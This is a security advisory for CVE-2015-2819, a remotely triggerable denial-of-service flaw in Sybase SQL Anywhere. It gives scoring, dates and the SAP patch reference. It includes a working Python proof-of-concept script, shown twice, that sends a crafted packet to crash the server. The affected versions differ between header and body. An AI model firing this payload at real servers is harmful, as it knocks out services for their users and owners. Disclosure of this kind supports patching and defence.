5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
0.005 Low
EPSS
Percentile
73.6%
Application: Sybase SQL Anywhere 11 and 16 Vendor URL:<http://www.sybase.com> **Bugs:**DoS **Reported:**09.12.2014 **Vendor response:**10.12.2014 **Date of Public Advisory:**15.03.2015 **Reference:**SAP Security Note 2108161 Authors: Vahagn Vardanyan (ERPScan)
Class: DoS [CWE-122]
Impact: DoS
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2015-2819
It is possible to use a denial of service vulnerability to terminate the process of the vulnerable component. As a result, nobody can use this service, which negatively affects business processes. System downtime also harms business reputation.
An anonymous attacker can use a special request to crash the Sybase SQL Anywhere process on the server.
SYBASE SQL Anywhere 12 and 16
Other versions are probably affected too, but they were not checked.
To correct this vulnerability, install SAP Security Note 2108161.
An anonymous attacker can use a special request to crash the Sybase SQL Anywhere process on the server.
import socket PoC = “\x1b\x00\x00\x50\x00\x00\x00\x00\x12\x43\x4f\x4e\x4e\x45\x43\x54” \ “\x49\x4f\x4e\x4c\x45\x53\x53\x5f\x54\x44\x53\x00\x00\x00\x01\x00” \ “\x00\x04\x08\x00\x00\x03\x01\x01\x04\x08\x00\x00\x00\x00\x00\x00” \ “\x00\x00\x07\x02\x04\xb1\x08\x11\x6d\x6f\x62\x69\x6c\x61\x32\x33” \ “\x5f\x70\x72\x69\x6d\x61\x72\x79\x00\x1b\x00\x00\x50\x00\x00\x00” \ “\x00\x12\x43\x4f\x4e\x4e\x45\x43\x54\x49\x4f\x4e\x4c\x45\x53\x53” \ “\x5f\x54\x44\x53\x00\x00\x00\x01\x00\x00\x04\x00\x05\x00\x06\x00” \ “\x00\x01\x02\x00\x00\x03\x01\x01\x04\x08\x00\x00\x00\x00\x00\x00” \ “\x00\x00\x07\x02\x04\xb1\x08\x11\x6d\x6f\x62\x69\x6c\x61\x32\x33” \ “\x5f\x70\x72\x69\x6d\x61\x72\x79\x00” s = socket.socket() s.settimeout(1) s.connect((SERVER_IP, SERVER_PORT)) s.send(PoC) print(PoC) s.close()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
import socket
PoC = “\x1b\x00\x00\x50\x00\x00\x00\x00\x12\x43\x4f\x4e\x4e\x45\x43\x54” \
“\x49\x4f\x4e\x4c\x45\x53\x53\x5f\x54\x44\x53\x00\x00\x00\x01\x00” \
“\x00\x04\x08\x00\x00\x03\x01\x01\x04\x08\x00\x00\x00\x00\x00\x00” \
“\x00\x00\x07\x02\x04\xb1\x08\x11\x6d\x6f\x62\x69\x6c\x61\x32\x33” \
“\x5f\x70\x72\x69\x6d\x61\x72\x79\x00\x1b\x00\x00\x50\x00\x00\x00” \
“\x00\x12\x43\x4f\x4e\x4e\x45\x43\x54\x49\x4f\x4e\x4c\x45\x53\x53” \
“\x5f\x54\x44\x53\x00\x00\x00\x01\x00\x00\x04\x00\x05\x00\x06\x00” \
“\x00\x01\x02\x00\x00\x03\x01\x01\x04\x08\x00\x00\x00\x00\x00\x00” \
“\x00\x00\x07\x02\x04\xb1\x08\x11\x6d\x6f\x62\x69\x6c\x61\x32\x33” \
“\x5f\x70\x72\x69\x6d\x61\x72\x79\x00”
s = socket.socket()
s.settimeout(1)
s.connect((SERVER_IP, SERVER_PORT))
s.send(PoC)
print(PoC)
s.close()
—|—
To prevent this issue as well as a plethora of other vulnerabilities that may affect your systems, ERPScan provides the following services: